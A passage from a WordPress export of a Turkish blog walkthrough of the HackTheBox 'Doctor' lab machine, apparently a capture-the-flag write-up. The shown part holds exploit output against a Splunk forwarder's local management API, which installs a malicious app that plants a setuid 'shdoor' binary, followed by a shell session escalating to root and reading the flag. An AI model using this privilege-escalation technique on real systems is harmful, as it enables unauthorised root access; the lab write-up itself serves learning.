name=&quot;disabled&quot;&gt;0&lt;\/s:key&gt;\n        &lt;s:key name=&quot;eai:acl&quot;&gt;\n          &lt;s:dict&gt;\n            &lt;s:key name=&quot;app&quot;&gt;system&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_change_perms&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_list&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_share_app&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_share_global&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_share_user&quot;&gt;0&lt;\/s:key&gt;\n            &lt;s:key name=&quot;can_write&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;modifiable&quot;&gt;1&lt;\/s:key&gt;\n            &lt;s:key name=&quot;owner&quot;&gt;nobody&lt;\/s:key&gt;\n            &lt;s:key name=&quot;perms&quot;&gt;\n              &lt;s:dict&gt;\n                &lt;s:key name=&quot;read&quot;&gt;\n                  &lt;s:list&gt;\n                    &lt;s:item&gt;*&lt;\/s:item&gt;\n                  &lt;\/s:list&gt;\n                &lt;\/s:key&gt;\n                &lt;s:key name=&quot;write&quot;&gt;\n                  &lt;s:list&gt;\n                    &lt;s:item&gt;*&lt;\/s:item&gt;\n                  &lt;\/s:list&gt;\n                &lt;\/s:key&gt;\n              &lt;\/s:dict&gt;\n            &lt;\/s:key&gt;\n            &lt;s:key name=&quot;removable&quot;&gt;0&lt;\/s:key&gt;\n            &lt;s:key name=&quot;sharing&quot;&gt;app&lt;\/s:key&gt;\n          &lt;\/s:dict&gt;\n        &lt;\/s:key&gt;\n        &lt;s:key name=&quot;install_source_checksum&quot;&gt;96d72ec1f36a6309f295ad8f425b2e83def957e9&lt;\/s:key&gt;\n        &lt;s:key name=&quot;label&quot;&gt;APPY&lt;\/s:key&gt;\n        &lt;s:key name=&quot;location&quot;&gt;\/opt\/splunkforwarder\/etc\/apps\/APPY&lt;\/s:key&gt;\n        &lt;s:key name=&quot;managed_by_deployment_client&quot;&gt;0&lt;\/s:key&gt;\n        &lt;s:key name=&quot;name&quot;&gt;APPY&lt;\/s:key&gt;\n        &lt;s:key name=&quot;show_in_nav&quot;&gt;1&lt;\/s:key&gt;\n        &lt;s:key name=&quot;source_location&quot;&gt;\/opt\/splunkforwarder\/etc\/apps\/APPY&lt;\/s:key&gt;\n        &lt;s:key name=&quot;state_change_requires_restart&quot;&gt;0&lt;\/s:key&gt;\n        &lt;s:key name=&quot;status&quot;&gt;installed&lt;\/s:key&gt;\n        &lt;s:key name=&quot;visible&quot;&gt;0&lt;\/s:key&gt;\n      &lt;\/s:dict&gt;\n    &lt;\/content&gt;\n  &lt;\/entry&gt;\n&lt;\/feed&gt;\n\n[*] Removing the malicious splunk app...\nHTTP\/1.1 200 OK\nDate: Sun, 15 Aug 2021 20:16:36 GMT\nExpires: Thu, 26 Oct 1978 00:00:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\nContent-Type: text\/xml; charset=UTF-8\nX-Content-Type-Options: nosniff\nContent-Length: 1797\nVary: Cookie, Authorization\nConnection: Close\nX-Frame-Options: SAMEORIGIN\nServer: Splunkd\n\n&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .--&gt;\n&lt;?xml-stylesheet type=&quot;text\/xml&quot; href=&quot;\/static\/atom.xsl&quot;?&gt;\n&lt;feed xmlns=&quot;http:\/\/www.w3.org\/2005\/Atom&quot; xmlns:s=&quot;http:\/\/dev.splunk.com\/ns\/rest&quot; xmlns:opensearch=&quot;http:\/\/a9.com\/-\/spec\/opensearch\/1.1\/&quot;&gt;\n  &lt;title&gt;localapps&lt;\/title&gt;\n  &lt;id&gt;https:\/\/127.0.0.1:8089\/services\/apps\/local&lt;\/id&gt;\n  &lt;updated&gt;2021-08-15T22:16:36+02:00&lt;\/updated&gt;\n  &lt;generator build=&quot;a1a6394cc5ae&quot; version=&quot;8.0.5&quot;\/&gt;\n  &lt;author&gt;\n    &lt;name&gt;Splunk&lt;\/name&gt;\n  &lt;\/author&gt;\n  &lt;link href=&quot;\/services\/apps\/local\/_new&quot; rel=&quot;create&quot;\/&gt;\n  &lt;link href=&quot;\/services\/apps\/local\/_reload&quot; rel=&quot;_reload&quot;\/&gt;\n  &lt;opensearch:totalResults&gt;0&lt;\/opensearch:totalResults&gt;\n  &lt;opensearch:itemsPerPage&gt;30&lt;\/opensearch:itemsPerPage&gt;\n  &lt;opensearch:startIndex&gt;0&lt;\/opensearch:startIndex&gt;\n  &lt;s:messages\/&gt;\n&lt;\/feed&gt;\n\n[!] If all went well run \/tmp\/.tester\/bin\/shdoor -p for a root shell\n[!] Run whoami if your prompt didn&#039;t change...\n\n[!] DELETE THE .tester DIRECTORY AS ROOT WHEN YOU&#039;RE DONE! [!]\n<\/code><\/pre>\n<pre><code class=\"language-sh\">shaun@doctor:\/tmp$ id\nid\nuid=1002(shaun) gid=1002(shaun) groups=1002(shaun)\n$ \/tmp\/.tester\/bin\/shdoor -p\n\/tmp\/.tester\/bin\/shdoor -p\n# id\nid\nuid=1002(shaun) gid=1002(shaun) euid=0(root) groups=1002(shaun)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt\n# cat root.txt \ncat root.txt\n74f6ab1181115f195f58f18e4e2ba485\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Doctor &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 8.2p1 Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/15\/doctor\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Doctor<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[611,610],"class_list":["post-1514","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-splunk","tag-ssti","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1514","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1514"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1514\/revisions"}],"predecessor-version":[{"id":1515,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1514\/revisions\/1515"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1514"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1514"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}